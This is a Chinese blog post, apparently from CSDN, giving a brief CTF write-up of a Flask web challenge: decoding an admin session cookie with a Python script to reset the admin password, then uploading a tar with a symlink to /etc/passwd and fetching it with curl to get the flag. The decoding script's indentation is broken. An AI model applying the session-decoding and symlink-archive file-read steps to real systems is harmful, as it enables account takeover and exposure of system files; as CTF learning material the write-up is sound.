PythonServer-Flask decode token

最新推荐文章于 2024-07-13 15:07:33 发布
最新推荐文章于 2024-07-13 15:07:33 发布
阅读量286 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctfweb Flask 文章标签: flask web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u013457794/article/details/88997027
这是一篇关于Flask应用的黑盒测试记录,讲述了如何通过解密获取admin的session token,从而实现密码修改。文章提到了利用Python3解密脚本,并指出在Python2和Python3环境下的不同运行结果。还描述了构造带有软链接文件的tar包来获取敏感信息的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一道有关Flask的黑盒题目,通过解密获得token。可惜没有及时截图,现在只剩下文字了,凑合记录一下。

2019年3月7日11:18:30

  1. 注册账户测试发现有admin,后登陆发现发现有上传页面,但提示说管理员才可以上传tar包

  2. 通过在修改密码页面填写‘admin’,在响应cookie里找到admin的session,运用python3的解密脚本解出token,即可成功修改密码,需注意flask脚本有在python2,python3环境下运行结果不同,需要测试后运行。脚本如下:

     #!/usr/bin/env python3
 import sys
 import zlib
 from base64 import b64decode
 from flask.sessions import session_json_serializer
 from itsdangerous import base64_decode
 
 def decryption(payload):
     payload, sig = payload.rsplit(b'.', 1)
     payload, timestamp = payload.rsplit(b'.', 1)

 decompress = False
 if payload.startswith(b'.'):
     payload = payload[1:]
     decompress = True

 try:
     payload = base64_decode(payload)
 except Exception as e:
     raise Exception('Could not base64 decode the payload because of '
                      'an exception')

 if decompress:
     try:
         payload = zlib.decompress(payload)
     except Exception as e:
         raise Exception('Could not zlib decompress the payload before '
                          'decoding the payload')

 return session_json_serializer.loads(payload)

 if __name__ == '__main__':
     print(decryption(sys.argv[1].encode()))

  3. 构造带有软链接文件的tar包

     ln -s /etc/passwd 1.jpg
 tar -cf 1.tar 1.jpg
 
 tar --help
 tar -cf archive.tar foo bar  # Create archive.tar from files foo and bar.
   tar -tvf archive.tar         # List all files in archive.tar verbosely.
   tar -xf archive.tar          # Extract all files from archive.tar.

  4. curl xxx/download/1.jpg 获得/etc/passwd的信息,得到flag

python flask token_Flask 用户名密码登录获取token
weixin_35981962的博客
01-15 2229
#简单的用户名密码登录获取token的方式importloggingfromflaskimportFlask,request,g,make_response,jsonifyfromflask_httpauthimportHTTPBasicAuth,HTTPTokenAuthfromitsdangerousimportTimedJSONWebSignatureSeri...
python-flask简单服务器框架
hadxu的博客
10-31 3679
python-flask简单服务器框架     最近在学校在跟老师做一个项目,是关于识别的系统,大概就是将手机拍到的图片上传服务器,然后判断此物品是什么返回给客户端也就是android端。由于以前没有开发服务器的经验,一直在寻找能够提供帮助的朋友,最后在百度的帮助下,实现flask的http服务器框架,接收get,post请求,并处理请求。Get是客户端向服务器发送请求,并不改变服务器的资
python token flask_flask 实现token机制
weixin_39675215的博客
12-05 808
token 的生成用token校验身份,是前后端交互的常用方式。它有以下特性:会失效加密可以根据它拿到用户的信息生成方式( 内部配置的私钥+有效期+用户的id )#导入依赖包from flask import request,jsonify,current_appfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializ...
python flask项目搭建web server
热门推荐
无效的博客
12-16 1万+
一、flask的自带web server 这是最简单的方式,用法: from flask import Flask app = Flask(appname) if __name__ == '__main__':          app.run(host='0.0.0.0',port=8000,debug=True) 这语句是flask框架的初始化语句,也是框架webser
基于python Flask搭建mockServer服务_mock server flask
2401_84247726的博客
04-16 1014
”"1)参数为空2)用户名密码正确3)用户密码错误“”"“”"Flask 框架里,可以用jsonify 返回 json数据使用 jsonify 时,返回的 http response 的 Content-Type 是application/json这样做是符合 HTTP 协议的规定的,这就是使用 jsonify 的原因之一“”"“msg”: “用户名和密码不能为空”})“city”: “北京”},“info”: {
Python Flask-RESTPlus 工程化实践
pydby01的博客
12-15 2288
本指南将逐步介绍构建用于测试、开发和生产环境的 Flask RESTPlus Web 应用程序的方法。 将使用基于 Linux 的操作系统(Ubuntu),但是大多数步骤都可以在 Windows 和 Mac 上执行。 在继续阅读本指南之前,你应该对 Python 编程语言和 Flask 框架有基本的了解。如果你不熟悉这些内容,建议阅读介绍性文章 -如何使用 Python 和 Flask 构建 Web 应用程序。 本指南的结构 本指南分为以下几部分: 功能 Flask-RESTPlus ...
快速实现用户认证:使用Python和Flask配合PyJWT生成与解密Token的教程及示例代码
陈钇钇的博客
02-17 2280
XUser类不仅定义了数据库表结构,还提供了方便的方法来操作和转换用户数据。通过使用 SQLAlchemy ORM,可以简化数据库操作,提高代码的可读性和可维护性。
Haytham个人博客开发日志 -- Flask+Vue基于token的登录状态与路由管理
HaythamXu的博客
09-15 1203
指路牌 符合一下关键词,这篇博客有可能会对你有帮助 不使用工厂函数的Flask应用 不使用蓝本的Flask应用 Flask跨域配置 基于Token的登录状态管理 Flask+Vue Vue路由拦截 Axios 钩子 适用场景 这是一篇个人博客搭建的记录博客,也是一篇关于Flask和Vue的简单"工具书",最后的代码会包含Web开发中常用的功能。(不全,只是使用频率相对高的) 环境 系统: 无...
Python库 | Flask-Argonaut-0.13.tar.gz
03-07
**Python库Flask-Argonaut详解** 在Python的Web开发领域,Flask是一个非常流行的轻量级框架,它以其简洁的API和高度可扩展性深受开发者喜爱。而`Flask-Argonaut`则是针对Flask框架的一个扩展库,用于增强Flask应用...
python token flask_flask 实现token机制的示例代码
weixin_39810901的博客
12-05 189
token 的生成用token校验身份,是前后端交互的常用方式。它有以下特性:会失效加密可以根据它拿到用户的信息生成方式( 内部配置的私钥+有效期+用户的id )#导入依赖包from flask import request,jsonify,current_appfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializ...
Python的Flask框架中SERVER_NAME域名项的配置教程
01-02
Flask中的SERVER_NAME主要做两件事: 协助Flask在活动的请求(request)之外生成绝对URL(比如邮件中嵌入网站URL) 用于子域名支持 很多人误以为它可以做这两件事之外的其它事情。 一、第一件事:绝对URL 我们知道,url_for默认情况下是生成相对URL,它有个参数_external,如果设置为真,则会生成一个绝对URL(就是HTTP开头带域名等信息的)。若不指定SERVER_NAME,默认使用当前活动的请求(request)来生成URL。 下面举个例子演示一下: # filename myapp.py from flask import Flask, u
Python Flask token身份认证
Saki_Python的博客
10-10 716
Python Flask是一个使用Python编写的轻量级Web应用框架,它可以非常方便地搭建Web应用。在Web应用中,经常需要进行身份认证,以确保只有授权用户才能访问某些资源。本文将介绍如何使用token进行身份认证,以及如何在Python Flask实现token身份认证。一、什么是token身份认证token身份认证(Token-based authentication)是一种常见的Web身份认证方式,它是利用token来确保用户的身份。
python基于Flask搭建Mock_server
qq_38571773的博客
03-29 1027
python基于Flask搭建Mock_server
python自动化之用flask校验接口token(把token作为参数)
最新发布
2301_76297780的博客
07-13 447
分享代码
基于python Flask搭建mockServer服务
分享测试知识
05-24 3512
前言: 为什么要用mockserver呢!我们自己内部接口需要使用微信,支付宝的支付功能,就需要验证和打钱才能返回固定的成功返回信息,成本太高,我们就可以用MockServer来模拟返回,绕过验证。 需要环境:python 、pycharm(其他编译器也是可以的)、flask。 需要了解概念: 一、MockServer是什么? 答:为实现mock概念而搭建的一个服务,Mock Server 在被测系统与外部系统之间搭建。 MockServer不是一个真实的后端系统, ...
python flask 令牌token原理及代码实现
w1054230914的博客
02-03 1754
python flask 令牌token原理及代码实现
Python+ Flask轻松实现Mock Server
主要分享测试的学习资源,帮助快速了解测试行业,帮助想转行、进阶、小白成长为高级测试工程师。
09-24 718
模拟接口接口Mock测试:在接口测试中,对于某些不容易构造或者不容易获取的接口,可以用一个模拟接口来代替。
token验证 python flask
05-25
data = jwt.decode(token, app.config['SECRET_KEY']) except: return jsonify({'message': 'Token is invalid!'}), 401 return f(*args, **kwargs) return decorated ``` 3. 在需要进行 token 验证的路由上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值